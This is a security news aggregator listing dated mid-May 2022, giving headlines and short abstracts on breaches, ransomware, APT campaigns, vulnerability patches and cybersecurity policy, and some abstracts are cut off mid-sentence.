May 16, 2022 – Breach
Update: Parker Hannifin reveals cyberattack exposed sensitive employee data Full Text
Abstract
Parker Hannifin said it began notifying potential victims, who include current and former employees, their dependents, and members of Parker’s Group Health Plans, on May 12.The Daily Swig
May 16, 2022 – Solution
Kali Linux 2022.2 released with 10 new tools, WSL improvements, and more Full Text
Abstract
Offensive Security has released Kali Linux 2022.2, the second version in 2022, with desktop enhancements, a fun April Fools screensaver, WSL GUI improvements, terminal tweaks, and best of all, new tools to play with!BleepingComputer
May 16, 2022 – Government
CISA Removes Windows Vulnerability From ‘Must-Patch’ List Due to Buggy Update Full Text
Abstract
The CISA has temporarily removed a Windows flaw from its Known Exploited Vulnerabilities Catalog after it was informed by Microsoft that a recent update can cause problems on some types of systems.Security Week
May 16, 2022 – Breach
Engineering firm Parker discloses data breach after ransomware attack Full Text
Abstract
The Parker-Hannifin Corporation announced a data breach exposing employees' personal information after the Conti ransomware gang began publishing allegedly stolen data last month.BleepingComputer
May 16, 2022 – Vulnerabilities
SonicWall Patches Unauthorized Access Vulnerability in SMA Appliances Full Text
Abstract
SonicWall has released patches for multiple vulnerabilities in its Secure Mobile Access (SMA) series appliances, including a high-severity issue that could lead to unauthorized access.Security Week
May 15, 2022 – Policy and Law
Europe Agrees to Adopt New NIS2 Directive Aimed at Hardening Cybersecurity Full Text
Abstract
The European Parliament announced a "provisional agreement" aimed at improving cybersecurity and resilience of both public and private sector entities in the European Union. The revised directive, called " NIS2 " (short for network and information systems), is expected to replace the existing legislation on cybersecurity that was established in July 2016. The revamp sets ground rules, requiring companies in energy, transport, financial markets, health, and digital infrastructure sectors to adhere to risk management measures and reporting obligations. Among the provisions in the new legislation are flagging cybersecurity incidents to authorities within 24 hours, patching software vulnerabilities, and readying risk management measures to secure networks, failing which can incur monetary penalties. "The directive will formally establish the European Cyber Crises Liaison Organization Network, EU-CyCLONe, which will support the coordinated management of largThe Hacker News
May 15, 2022 – Criminals
Ukrainian Hacker Jailed for 4-Years in U.S. for Selling Access to Hacked Servers Full Text
Abstract
A 28-year-old Ukrainian national has been sentenced to four years in prison for siphoning thousands of server login credentials and selling them on the dark web for monetary gain as part of a credential theft scheme. Glib Oleksandr Ivanov-Tolpintsev , who pleaded guilty to his offenses earlier this February, was arrested in Poland in October 2020, before being extradited to the U.S. in September 2021. The illegal sale involved the trafficking of login credentials to servers located across the world and personally identifiable information such as dates of birth and Social Security numbers belonging to U.S. residents on a darknet marketplace. The unnamed site purportedly offered over 700,000 compromised servers for sale, including at least 150,000 in the U.S. alone. Believed to have been operational from around October 2014, the underground marketplace was seized by law enforcement authorities on January 24, 2019, according to court documents. This exactly coincides with the dismThe Hacker News
May 15, 2022 – Attack
Hackers are exploiting critical bug in Zyxel firewalls and VPNs Full Text
Abstract
Hackers have started to exploit a recently patched critical vulnerability, tracked as CVE-2022-30525, that affects Zyxel firewall and VPN devices for businesses.BleepingComputer
May 15, 2022 – Attack
Unique IceApple Attack Framework Targets Multiple Sectors Full Text
Abstract
CrowdStrike encountered a previously undocumented post-exploitation framework called IceApple deployed on Exchange servers for data exfiltration. Its long-running campaign focuses on intelligence gathering and indicates that it is a state-sponsored mission, allegedly, aligning with China-nexus, s ... Read MoreCyware Alerts - Hacker News
May 15, 2022 – General
May 08 – May 14 Ukraine – Russia the silent cyber conflict Full Text
Abstract
This post provides a timeline of the events related to Russia invasion of Ukraine from the cyber security perspective. Below is the timeline of the events related to the ongoing Russia invasion that occurred in the previous weeks: May 14 - The LEGION...Security Affairs
May 15, 2022 – Phishing
Fake Pixelmon NFT site infects you with password-stealing malware Full Text
Abstract
A fake Pixelmon NFT site entices fans with free tokens and collectibles while infecting them with malware that steals their cryptocurrency wallets.BleepingComputer
May 15, 2022 – Malware
Eternity Project - A New Swiss Army Knife for Threat Actors Full Text
Abstract
Threat actors are using Tor and Telegram to spread the Eternity malware that is customizable to modules, including a stealer, clipper, worm, miner, and ransomware. It can pilfer information from cryptocurrency extensions or even cold wallets. It also targets password managers, VPN clients, messenge ... Read MoreCyware Alerts - Hacker News
May 15, 2022 – General
Security Affairs newsletter Round 365 by Pierluigi Paganini Full Text
Abstract
A new round of the weekly Security Affairs newsletter arrived! Every week the best security articles from Security Affairs for free in your email box. If you want to also receive for free the newsletter with the international press subscribe here....Security Affairs
May 15, 2022 – APT
Ukraine CERT-UA warns of new attacks launched by Russia-linked Armageddon APT Full Text
Abstract
Ukraine Computer Emergency Response Team (CERT-UA) reported a phishing campaign conducted by Armageddon APT using GammaLoad.PS1_v2 malware. Ukraine Computer Emergency Response Team (CERT-UA) reported a phishing campaign using messages with subject...Security Affairs
May 15, 2022 – Botnet
Sysrv-K, a new variant of the Sysrv botnet includes new exploits Full Text
Abstract
Microsoft reported that the Sysrv botnet is targeting Windows and Linux servers exploiting flaws in the Spring Framework and WordPress. Microsoft Security Intelligence team Microsoft reported that a new variant of the Sysrv botnet,...Security Affairs
May 14, 2022 – Education
Get Lifetime Access to 2022 Cybersecurity Certification Prep Courses @ 95% Off Full Text
Abstract
Ever thought about working full-time in cybersecurity ? With millions of unfilled jobs around, now is a great time to get into the industry. Of course, there are many different roles in this field. But all of them require the same handful of professional certifications. The 2022 Ultimate Advanced CyberSecurity Professional Certification Bundle helps you collect the full house, with five full-length courses working towards key exams . The included training has a total value of $1,475. But in a special deal for readers of The Hacker News, the bundle is now available for only $69. Special Offer — You can currently get five top-rated cybersecurity certification courses for only $69, with lifetime access included! Whether you want to be a penetration tester or a cybersecurity researcher, technical recruiters want to see proof of your security expertise. NIST is required for government projects. Meanwhile, CISSP, ISACA, and CASP+ can open doors in the private sector. In this buThe Hacker News
May 14, 2022 – Vulnerabilities
Microsoft fixes new PetitPotam Windows NTLM Relay attack vector Full Text
Abstract
A recent security update for a Windows NTLM Relay Attack has been confirmed to be a previously unfixed vector for the PetitPotam attack.BleepingComputer
May 14, 2022 – Insider Threat
Angry IT admin wipes employer’s databases, gets 7 years in prison Full Text
Abstract
Han Bing, a former database administrator for Lianjia, a Chinese real-estate brokerage giant, has been sentenced to 7 years in prison for logging into corporate systems and deleting the company's data.BleepingComputer
May 14, 2022 – Policy and Law
Crypto robber who lured victims via Snapchat and stole £34,000 jailed Full Text
Abstract
Online crypto scams and ponzi schemes leveraging social media platforms are hardly anything new. But, this gruesome case of a London-based crypto robber transcends the virtual realm and tells a shocking tale of real-life victims from whom the perpetrator successfully stole £34,000.BleepingComputer
May 14, 2022 – Denial Of Service
The LEGION collective calls to action to attack the final of the Eurovision song contest Full Text
Abstract
The Pro-Russian volunteer movement known as LEGION is calling to launch DDoS attacks against the final of the Eurovision song contest. The LEGION is a Pro-Russian volunteer movement that focuses on DDOS attacks. The group made the headlines for attacks...Security Affairs
May 14, 2022 – Breach
OpRussia update: Anonymous breached other organizations Full Text
Abstract
Another week has passed and Anonymous has hacked other Russian companies and leaked their data via DDoSecrets. The #OpRussia launched by Anonymous on Russia after the criminal invasion of Ukraine continues, the collective claims to have hacked multiple...Security Affairs
May 14, 2022 – Attack
Pro-Russian hacktivists target Italy government websites Full Text
Abstract
Pro-Russian hacker group Killnet targeted the websites of several Italian institutions, including the senate and the National Institute of Health. A group of Pro-Russian hackers known as "Killnet" launched an attack against multiple websites of several...Security Affairs
May 14, 2022 – Vulnerabilities
Critical Vulnerabilities Provide Root Access to InHand Industrial Routers Full Text
Abstract
A total of 17 vulnerabilities have been found in a wireless industrial router made by InHand Networks, including flaws that can be chained to gain root access by getting a user to click on a malicious link.Security Week
May 14, 2022 – Vulnerabilities
Critical flaw in Zyxel firewalls grants access to corporate networks Full Text
Abstract
A critical vulnerability, CVE-2022-30525, affecting several models of Zyxel firewalls has been publicly revealed, along with a Metasploit module that exploits it. The patches for the vulnerability are available.Help Net Security
May 14, 2022 – Criminals
These ransomware attackers sent their ransom note to the victim’s printer Full Text
Abstract
Researchers have detailed a string of cyberattacks involving ransomware which took place in early 2022 to an Iranian hacking group they refer to as Cobalt Mirage – also known as APT35, Charming Kitten, Phosphorus, and TA453 by other research groups.ZDNet
May 13, 2022 – Ransomware
The Week in Ransomware - May 13th 2022 - A National Emergency Full Text
Abstract
While ransomware attacks have slowed during Russia's invasion of Ukraine and the subsequent sanctions, the malware threat continues to affect organizations worldwide.BleepingComputer
May 13, 2022 – Solution
Google Created ‘Open Source Maintenance Crew’ to Help Secure Critical Projects Full Text
Abstract
Google on Thursday announced the creation of a new "Open Source Maintenance Crew" to focus on bolstering the security of critical open source projects. Additionally, the tech giant pointed out Open Source Insights as a tool for analyzing packages and their dependency graphs, using it to determine "whether a vulnerability in a dependency might affect your code." "With this information, developers can understand how their software is put together and the consequences to changes in their dependencies," the company said. The development comes as security and trust in the open source software ecosystem has been increasingly thrown into question in the aftermath of a string of supply chain attacks designed to compromise developer workflows. In December 2021, a critical flaw in the ubiquitous open source Log4j logging library left several companies scrambling to patch their systems against potential abuse. The announcement also comes less thanThe Hacker News
May 13, 2022 – Education
How to Fight Foreign Hackers With Civil Litigation Full Text
Abstract
Major tech companies have begun to employ Microsoft’s strategy of suing cybercriminals who operate major botnets or engage in massive phishing schemes.Lawfare
May 13, 2022 – Vulnerabilities
SonicWall urges customers to fix SMA 1000 vulnerabilities Full Text
Abstract
SonicWall warns customers to address several high-risk security flaws impacting its Secure Mobile Access (SMA) 1000 Series line of products. SonicWall urges customers to address several high-risk security vulnerabilities affecting its Secure...Security Affairs
May 13, 2022 – Denial Of Service
Italian CERT: Hacktivists hit govt sites in ‘Slow HTTP’ DDoS attacks Full Text
Abstract
Italy's Computer Security Incident Response Team (CSIRT) has published an announcement about the recent DDoS attacks that key sites in the country suffered in the last couple of days.BleepingComputer
May 13, 2022 – Attack
New Saitama backdoor Targeted Official from Jordan’s Foreign Ministry Full Text
Abstract
A spear-phishing campaign targeting Jordan's foreign ministry has been observed dropping a new stealthy backdoor dubbed Saitama. Researchers from Malwarebytes and Fortinet FortiGuard Labs attributed the campaign to an Iranian cyber espionage threat actor tracked under the moniker APT34, citing resemblances to past campaigns staged by the group. "Like many of these attacks, the email contained a malicious attachment," Fortinet researcher Fred Gutierrez said . "However, the attached threat was not a garden-variety malware. Instead, it had the capabilities and techniques usually associated with advanced persistent threats (APTs)." APT34, also known as OilRig, Helix Kitten, and Cobalt Gypsy, is known to be active since at least 2014 and has a track record of striking telecom, government, defense, oil, and financial sectors in the Middle East and North Africa (MENA) via targeted phishing attacks. Earlier this February, ESET tied the group to a long-runniThe Hacker News
May 13, 2022 – Vulnerabilities
Zyxel fixed firewall unauthenticated remote command injection issue Full Text
Abstract
Zyxel addressed a critical flaw affecting Zyxel firewall devices that allows unauthenticated, remote attackers to gain arbitrary code execution. Zyxel has moved to address a critical security vulnerability (CVE-2022-30525, CVSS score: 9.8) affecting...Security Affairs
May 13, 2022 – Botnet
Microsoft: Sysrv botnet targets Windows, Linux servers with new exploits Full Text
Abstract
Microsoft says the Sysrv botnet is now exploiting vulnerabilities in the Spring Framework and WordPress to ensnare and deploy cryptomining malware on vulnerable Windows and Linux servers.BleepingComputer
May 13, 2022 – Attack
Iran-linked COBALT MIRAGE group uses ransomware in its operations Full Text
Abstract
Iranian group used Bitlocker and DiskCryptor in a series of attacks targeting organizations in Israel, the US, Europe, and Australia. Researchers at Secureworks Counter Threat Unit (CTU) are investigating a series of attacks conducted by the Iran-linked...Security Affairs
May 13, 2022 – Malware
Fake Binance NFT Mystery Box bots steal victim’s crypto wallets Full Text
Abstract
A new RedLine malware distribution campaign promotes fake Binance NFT mystery box bots on YouTube to lure people into infecting themselves with the information-stealing malware from GitHub repositories.BleepingComputer
May 13, 2022 – General
Most Organizations Hit by Ransomware Would Pay If Hit Again Full Text
Abstract
Almost nine in 10 organizations that have suffered a ransomware attack would choose to pay the ransom if hit again, according to a new report, compared with two-thirds of those that have not experienced an attack.The Register
May 13, 2022 – Vulnerabilities
SonicWall ‘strongly urges’ admins to patch SSLVPN SMA1000 bugs Full Text
Abstract
SonicWall "strongly urges" customers to patch several high-risk security flaws impacting its Secure Mobile Access (SMA) 1000 Series line of products that can let attackers bypass authorization and, potentially, compromise unpatched appliances.BleepingComputer
May 13, 2022 – Business
StackHawk Raises $20.7 Million in Series B Funding Full Text
Abstract
The round, which brings total funding raised to $35.3m, was led by Sapphire and Costanoa Ventures with the participation of others. The company intends to use the funds to invest in product development.FinSMEs
May 13, 2022 – General
Google Chrome updates failing on Android devices in Russia Full Text
Abstract
A growing number of Russian Chrome users on Android report getting errors when attempting to install the latest available update of the popular web browser.BleepingComputer
May 13, 2022 – Attack
Malware Campaign Targets At Least 14 German Automakers Full Text
Abstract
Researchers exposed a months-long campaign targeting German car dealerships and manufacturers to deploy a variety of info-stealing malware. Attacks were traced back to 14 targeted entities in the country. To remain protected, organizations are recommended to use a strong password, deploy anti-phish ... Read MoreCyware Alerts - Hacker News
May 13, 2022 – Criminals
New Clues Indicate REvil is All Set for a Comeback Full Text
Abstract
The once defunct REvil ransomware is indeed back on the scene as researchers throw light on new developments. The latest version of the malware tracked as 2.08 boasts some key modifications. Organizations must stay ahead of such threats and bolster their defense systems to thwart future ransomware ... Read MoreCyware Alerts - Hacker News
May 13, 2022 – Botnet
FluBot Spreads via SMS Campaigns to Target Finnish People Full Text
Abstract
The NCSC-FI issued a warning about increased FluBot activities. Now, it has gone beyond Android to target iPhone users via a new campaign that uses SMS and MMS. These SMS messages contain links to voicemail, missed call notifications, or alerts about incoming money from an unknown financial transac ... Read MoreCyware Alerts - Hacker News
May 12, 2022 – Vulnerabilities
Zyxel fixes firewall flaws that could lead to hacked networks Full Text
Abstract
Threat analysts who discovered a vulnerability affecting multiple Zyxel products report that the network equipment company fixed it via a silent update pushed out two weeks ago.BleepingComputer
May 12, 2022 – Attack
Iranian hackers exposed in a highly targeted espionage campaign Full Text
Abstract
Threat analysts have spotted a novel attack attributed to the Iranian hacking group known as APT34 group or Oilrig, who targeted a Jordanian diplomat with custom-crafted tools.BleepingComputer
May 12, 2022 – Vulnerabilities
HP Patches UEFI Vulnerabilities Affecting Over 200 Computers Full Text
Abstract
HP on Wednesday announced the release of patches for two high-severity vulnerabilities that impact the UEFI firmware of more than 200 laptops, workstations, and other products.Security Week
May 12, 2022 – Attack
Iranian Hackers Leveraging BitLocker and DiskCryptor in Ransomware Attacks Full Text
Abstract
A ransomware group with an Iranian operational connection has been linked to a string of file-encrypting malware attacks targeting organizations in Israel, the U.S., Europe, and Australia. Cybersecurity firm Secureworks attributed the intrusions to a threat actor it tracks under the moniker Cobalt Mirage, which it said is linked to an Iranian hacking crew dubbed Cobalt Illusion (aka APT35, Charming Kitten, Newscaster, or Phosphorus). "Elements of Cobalt Mirage activity have been reported as Phosphorus and TunnelVision ," Secureworks Counter Threat Unit (CTU) said in a report shared with The Hacker News. The threat actor is said to have conducted two different sets of intrusions, one of which relates to opportunistic ransomware attacks involving the use of legitimate tools like BitLocker and DiskCryptor for financial gain. The second set of attacks are more targeted, carried out with the primary goal of securing access and gathering intelligence, while also deplThe Hacker News
May 12, 2022 – Covid-19
New Nerbian RAT spreads via malspam campaigns using COVID-19 Full Text
Abstract
Researchers spotted a new remote access trojan, named Nerbian RAT, which implements sophisticated evasion and anti-analysis techniques. Researchers from Proofpoint discovered a new remote access trojan called Nerbian RAT that implements sophisticated...Security Affairs
May 12, 2022 – Malware
Malware Builder Leverages Discord Webhooks Full Text
Abstract
Researchers discovered a simple malware builder designed to steal credentials, then pinging them to Discord webhooks.Threatpost
May 12, 2022 – Policy and Law
Ukrainian imprisoned for selling access to thousands of PCs Full Text
Abstract
Glib Oleksandr Ivanov-Tolpintsev, a 28-year-old from Ukraine, was sentenced today to 4 years in prison for stealing thousands of login credentials per week and selling them on a dark web marketplace.BleepingComputer
May 12, 2022 – Government
The Stakes ‘Could Not be Any Higher’: CISA Chief Talks About the Tech Challenges Ahead Full Text
Abstract
Security by design needs to be ingrained in software development and innovative thinking is required to help secure society against cyber attacks as technology become a bigger part of our everyday lives.ZDNet
May 12, 2022 – Policy and Law
E.U. Proposes New Rules for Tech Companies to Combat Online Child Sexual Abuse Full Text
Abstract
The European Commission on Wednesday proposed new regulation that would require tech companies to scan for child sexual abuse material (CSAM) and grooming behavior, raising worries that it could undermine end-to-end encryption (E2EE). To that end, online service providers, including hosting services and communication apps, are expected to proactively scan their platforms for CSAM as well as report, remove and disable access to such illicit content. While instant messaging services like WhatsApp already rely on hashed versions of known CSAM to automatically block new uploads of images or videos matching them, the new plan requires such platforms to identify and flag new instances of CSAM. "Detection technologies must only be used for the purpose of detecting child sexual abuse," the regulator said . "Providers will have to deploy technologies that are the least privacy-intrusive in accordance with the state of the art in the industry, and that limit the error ratThe Hacker News
May 12, 2022 – Breach
Massive hacking campaign compromised thousands of WordPress websites Full Text
Abstract
Researchers uncovered a massive hacking campaign that compromised thousands of WordPress websites to redirect visitors to scam sites. Cybersecurity researchers from Sucuri uncovered a massive campaign that compromised thousands of WordPress websites...Security Affairs
May 12, 2022 – Malware
Eternity malware kit offers stealer, miner, worm, ransomware tools Full Text
Abstract
Threat actors have launched the 'Eternity Project,' a new malware-as-a-service where threat actors can purchase a malware toolkit that can be customized with different modules depending on the attack being conducted.BleepingComputer
May 12, 2022 – Vulnerabilities
Chrome 101 Update Patches High-Severity Vulnerabilities Full Text
Abstract
Based on severity ratings and the currently listed bug bounties, the most important of these flaws is CVE-2022-1633, a high-severity use-after-free in Sharesheet that was reported by Khalil Zhani, who was awarded a $5,000 reward for the find.Security Week
May 12, 2022 – Breach
Thousands of WordPress Sites Hacked to Redirect Visitors to Scam Sites Full Text
Abstract
Cybersecurity researchers have disclosed a massive campaign that's responsible for injecting malicious JavaScript code into compromised WordPress websites that redirects visitors to scam pages and other malicious websites to generate illegitimate traffic. "The websites all shared a common issue — malicious JavaScript had been injected within their website's files and the database, including legitimate core WordPress files," Krasimir Konov, a malware analyst at Sucuri, said in a report published Wednesday. This involved infecting files such as jquery.min.js and jquery-migrate.min.js with obfuscated JavaScript that's activated on every page load, allowing the attacker to redirect the website visitors to a destination of their choice. The GoDaddy-owned website security company said that the domains at the end of the redirect chain could be used to load advertisements, phishing pages, malware, or even trigger another set of redirects. In some instances, unsusThe Hacker News
May 12, 2022 – Vulnerabilities
Red TIM Research (RTR) founds 2 bugs affecting F5 Traffix SDC Full Text
Abstract
Experts at TIM research laboratory, Red Team Research (RTR), have disclosed a couple of bugs affecting F5 Traffix SDC. Among these 45 bugs fixed by the well-known manufacturer of computer security systems, 2 were detected by TIM research laboratory,...Security Affairs
May 12, 2022 – Vulnerabilities
Zyxel silently fixes critical RCE vulnerability in firewall products Full Text
Abstract
Threat analysts who discovered a vulnerability affecting multiple Zyxel products report that the network equipment company fixed it via a silent update pushed out two weeks ago.BleepingComputer
May 12, 2022 – Vulnerabilities
Intel Patches High-Severity Vulnerabilities in BIOS, Boot Guard Full Text
Abstract
Intel also announced the release of patches for a high-severity bug in Boot Guard and Trusted Execution Technology (TXT). Tracked as CVE-2022-0004 (CVSS score of 7.3), the bug could be exploited to elevate privileges on a vulnerable system.Security Week
May 12, 2022 – Solution
Android and Chrome Users Can Soon Generate Virtual Credit Cards to Protect Real Ones Full Text
Abstract
Google on Wednesday took to its annual developer conference to announce a host of privacy and security updates, including support for virtual credit cards on Android and Chrome. "When you use autofill to enter your payment details at checkout, virtual cards will add an additional layer of security by replacing your actual card number with a distinct, virtual number," Google's Jen Fitzpatrick said in a statement. The goal, the search giant, said to keep payment information safe and secure during online shopping and protect users from skimming attacks wherein threat actors inject malicious JavaScript code to plunder credit card numbers and sell them on the black market. The feature is expected to roll out in the U.S. for Visa, American Express, Mastercard, and Capital One cards starting this summer. Interestingly, while Apple offers an option to mask email addresses via Hide My Email , which enables users to create unique, random email addresses to use with appsThe Hacker News
May 12, 2022 – Government
Five Eyes agencies warn of attacks on MSPs Full Text
Abstract
Cybersecurity authorities from Five Eye warn of threats targeting managed service providers (MSPs) and potential supply chain attacks through them. Multiple cybersecurity authorities from Australia, Canada, New Zealand, the U.K., and the U.S. this...Security Affairs
May 12, 2022 – Malware
BPFdoor: Stealthy Linux malware bypasses firewalls for remote access Full Text
Abstract
A recently discovered backdoor malware called BPFdoor has been stealthily targeting Linux and Solaris systems without being noticed for more than five years.BleepingComputer
May 12, 2022 – Vulnerabilities
Hundreds of Thousands of Konica Printers Vulnerable to Hacking via Physical Access Full Text
Abstract
Researchers at Atos-owned cybersecurity consulting firm SEC Consult analyzed Konica Minolta printers to determine what could be achieved by an attacker who has physical access to a device. The answer: a lot!Security Week
May 12, 2022 – Education
Everything We Learned From the LAPSUS$ Attacks Full Text
Abstract
In recent months, a cybercriminal gang known as LAPSUS$ has claimed responsibility for a number of high-profile attacks against technology companies, including: T-Mobile (April 23, 2022) Globant Okta Ubisoft Samsung Nvidia Microsoft Vodafone In addition to these attacks, LAPSUS$ was also able to successfully launch a ransomware attack against the Brazilian Ministry of Health. While high-profile cyber-attacks are certainly nothing new, there are several things that make LAPSUS$ unique. The alleged mastermind of these attacks and several other alleged accomplices were all teenagers. Unlike more traditional ransomware gangs, LAPSUS$ has a very strong social media presence. The gang is best known for data exfiltration. It has stolen source code and other proprietary information and has often leaked this information on the Internet. LAPSUS$ stolen credentials In the case of Nvidia, for example, the attackers gained access to hundreds of gigabytes of proprietary data ,The Hacker News
May 12, 2022 – Education
Historic Hotel Stay, Complementary Emotet Exposure included Full Text
Abstract
Historic Hotel of America serving up modern malware to their guests. Why securing your inbox with more than just anti-malware engines is needed to prevent cybercrime attacks.BleepingComputer
May 11, 2022 – Vulnerabilities
Actively Exploited Zero-Day Bug Patched by Microsoft Full Text
Abstract
Microsoft’s May Patch Tuesday roundup also included critical fixes for a number of flaws found in infrastructure present in many enterprise and cloud environments.Threatpost
May 11, 2022 – Outage
Ransomware Deals Deathblow to 157-year-old College Full Text
Abstract
Why a private college that stayed in business for 157 years had to close after the combo of COVID-19 and ransomware proved too much.Threatpost
May 11, 2022 – Government
Government Agencies Warn of Increase in Cyberattacks Targeting MSPs Full Text
Abstract
Multiple cybersecurity authorities from Australia, Canada, New Zealand, the U.K., and the U.S. on Wednesday released a joint advisory warning of threats targeting managed service providers (MSPs) and their customers. Key among the recommendations include identifying and disabling accounts that are no longer in use, enforcing multi-factor authentication (MFA) on MSP accounts that access customer environments, and ensuring transparency in ownership of security roles and responsibilities. MSPs have emerged as an attractive attack route for cybercriminals to scale their attacks, as a vulnerable provider can be weaponized as an initial access vector to breach several downstream customers at once. The spillover effects of such intrusions, as witnessed in the wake of high-profile breaches aimed at SolarWinds and Kaseya in recent years, have once again underlined the need to secure the software supply chain. The targeting of MSPs by malicious cyber actors in an effort to "explThe Hacker News
May 11, 2022 – Malware
Hackers Deploy IceApple Exploitation Framework on Hacked MS Exchange Servers Full Text
Abstract
Researchers have detailed a previously undocumented .NET-based post-exploitation framework called IceApple that has been deployed on Microsoft Exchange server instances to facilitate reconnaissance and data exfiltration. "Suspected to be the work of a state-nexus adversary, IceApple remains under active development, with 18 modules observed in use across a number of enterprise environments, as of May 2022," CrowdStrike said in a Wednesday report. The cybersecurity firm, which discovered the sophisticated malware in late 2021, noted its presence in multiple victim networks and in geographically distinct locations. Targeted victims span a wide range of sectors, including technology, academic, and government entities. A post-exploitation toolset, as the name implies, is not used to provide initial access, but is rather employed to carry out follow-on attacks after having already compromised the hosts in question. IceApple is notable for the fact that it's an in-memoThe Hacker News
May 11, 2022 – Policy and Law
US charges hacker for breaching brokerage accounts, securities fraud Full Text
Abstract
The U.S. Department of Justice (DoJ) has charged Idris Dayo Mustapha for a range of cybercrime activities that took place between 2011 and 2018, resulting in financial losses estimated to over $5,000,000.BleepingComputer
May 11, 2022 – Business
Concentric AI Raises $14.5M in Series A Funding Full Text
Abstract
Concentric Inc. raised $14.5 million in Series A funding led by Ballistic Ventures with participation from Citi Ventures and current investors Core Ventures Group, Engineering Capital, and Clear Ventures.FinSMEs
May 11, 2022 – APT
Bitter APT Hackers Add Bangladesh to Their List of Targets in South Asia Full Text
Abstract
An espionage-focused threat actor known for targeting China, Pakistan, and Saudi Arabia has expanded to set its sights on Bangladeshi government organizations as part of an ongoing campaign that commenced in August 2021. Cybersecurity firm Cisco Talos attributed the activity with moderate confidence to a hacking group dubbed the Bitter APT based on overlaps in the command-and-control (C2) infrastructure with that of prior campaigns mounted by the same actor. "Bangladesh fits the profile we have defined for this threat actor, previously targeting Southeast Asian countries including China , Pakistan, and Saudi Arabia," Vitor Ventura, lead security researcher at Cisco Talos for EMEA and Asia, told The Hacker News. "And now, in this latest campaign, they have widened their reach to Bangladesh. Any new country in southeast Asia being targeted by Bitter APT shouldn't be of surprise." Bitter (aka APT-C-08 or T-APT-17) is suspected to be a South Asian hackingThe Hacker News
May 11, 2022 – Government
CISA adds CVE-2022-1388 flaw in F5 BIG-IP to its Known Exploited Vulnerabilities Catalog Full Text
Abstract
US Critical Infrastructure Security Agency (CISA) adds critical CVE-2022-1388 flaw in F5 BIG-IP products to its Known Exploited Vulnerabilities Catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added critical CVE-2022-1388...Security Affairs
May 11, 2022 – Vulnerabilities
Intel Memory Bug Poses Risk for Hundreds of Products Full Text
Abstract
Dell and HP were among the first to release patches and fixes for the bug.Threatpost
May 11, 2022 – Vulnerabilities
HP fixes bug letting attackers overwrite firmware in over 200 models Full Text
Abstract
HP has released BIOS updates today to fix two high-severity vulnerabilities affecting a wide range of PC and notebook products, which might allow arbitrary code execution.BleepingComputer
May 11, 2022 – Phishing
Vanity URLs Could be Spoofed for Social Engineering Attacks Full Text
Abstract
Vanity links created by companies to add their brand to well-known cloud services could become a useful vector for phishing attacks and a way to better fool victims, researchers warn.Dark Reading
May 11, 2022 – Malware
Researchers Warn of Nerbian RAT Targeting Entities in Italy, Spain, and the U.K Full Text
Abstract
A previously undocumented remote access trojan (RAT) written in the Go programming language has been spotted disproportionately targeting entities in Italy, Spain, and the U.K. Called Nerbian RAT by enterprise security firm Proofpoint, the novel malware leverages COVID-19-themed lures to propagate as part of a low volume email-borne phishing campaign that started on April 26, 2022. "The newly identified Nerbian RAT leverages multiple anti-analysis components spread across several stages, including multiple open-source libraries," Proofpoint researchers said in a report shared with The Hacker News. "It is written in operating system (OS) agnostic Go programming language, compiled for 64-bit systems, and leverages several encryption routines to further evade network analysis." The messages, amounting to less than 100 in number, purport to be from the World Health Organization about safety measures related to COVID-19, urging potential victims to open a macrThe Hacker News
May 11, 2022 – Phishing
Novel Phishing Trick Uses Weird Links to Bypass Spam Filters Full Text
Abstract
A novel form of phishing takes advantage of a disparity between how browsers and email inboxes read web domains.Threatpost
May 11, 2022 – Malware
New stealthy Nerbian RAT malware spotted in ongoing attacks Full Text
Abstract
A new remote access trojan called Nerbian RAT has been discovered that includes a rich set of features, including the ability to evade detection and analysis by researchers.BleepingComputer
May 11, 2022 – Hacker
Hackers are using tech services companies as a ‘launchpad’ for attacks on customers Full Text
Abstract
A warning from international cybersecurity agencies has urged IT service providers and their customers to take action to protect themselves from the threat of supply chain attacks.ZDNet
May 11, 2022 – Education
[White Paper] Social Engineering: What You Need to Know to Stay Resilient Full Text
Abstract
Security and IT teams are losing sleep as would-be intruders lay siege to the weakest link in any organization's digital defense: employees. By preying on human emotion, social engineering scams inflict billions of dollars of damage with minimal planning or expertise. Cybercriminals find it easier to manipulate people before resorting to technical "hacking" tactics. Recent research reveals that social engineering is leveraged in 98% of attacks. As the rapid, ongoing acceleration of remote work raises the stakes, security leaders are fighting back with education and awareness. Resources developed by experts, like this new white paper — " Social Engineering: What You Need to Know to Stay Resilient " — identify the most common tactics, track how these types of attacks are evolving, and provide tips to protect organizations and their end-users. These insights not only inform security practitioners of the latest tactics and emerging threats, but help employees undeThe Hacker News
May 11, 2022 – Government
CISA tells federal agencies to fix actively exploited F5 BIG-IP bug Full Text
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a new security vulnerability to its list of actively exploited bugs, the critical severity CVE-2022-1388 affecting BIG-IP network devices.BleepingComputer
May 11, 2022 – Solution
Yahoo! JAPAN Enables Fingerprint and Face Login to Its Service Apps and Smartphone Browsers Full Text
Abstract
Yahoo Japan Corporation has completed the implementation of biometric authentication to the Android version of Yahoo! JAPAN service apps. With this, biometric authentication can now be used to log in to Yahoo! JAPAN’s various service apps.Yahoo Finance
May 11, 2022 – Malware
Malicious NPM Packages Target German Companies in Supply Chain Attack Full Text
Abstract
Cybersecurity researchers have discovered a number of malicious packages in the NPM registry specifically targeting a number of prominent media, logistics, and industrial firms based in Germany to carry out supply chain attacks . "Compared with most malware found in the NPM repository, this payload seems particularly dangerous: a highly-sophisticated, obfuscated piece of malware that acts as a backdoor and allows the attacker to take total control over the infected machine," researchers from JFrog said in a new report. The DevOps company said that evidence points to it being either the work of a sophisticated threat actor or a "very aggressive" penetration test. All the rogue packages, most of which have since been removed from the repository, have been traced to four "maintainers" - bertelsmannnpm, boschnodemodules, stihlnodemodules, and dbschenkernpm — indicating an attempt to impersonate legitimate firms like Bertelsmann, Bosch, Stihl, and DB ScThe Hacker News
May 11, 2022 – General
Our Medical Devices’ Open Source Problem – What Are the Risks? Full Text
Abstract
There is no doubt that open source powers our development processes, enabling software developers to build high quality, innovative products faster than ever before. But OSS also comes with its own set of risks that device manufacturers must address while leveraging its many advantages.BleepingComputer
May 11, 2022 – APT
Bitter APT Adds Bangladesh to its Targets Full Text
Abstract
Bitter APT, known for targeting China, Pakistan, and Saudi Arabia, reportedly added Bangladesh to its list of targets as researchers find malicious emails sent to officers of the Bangladesh police.Cisco Talos
May 11, 2022 – Government
FBI, CISA, and NSA warn of hackers increasingly targeting MSPs Full Text
Abstract
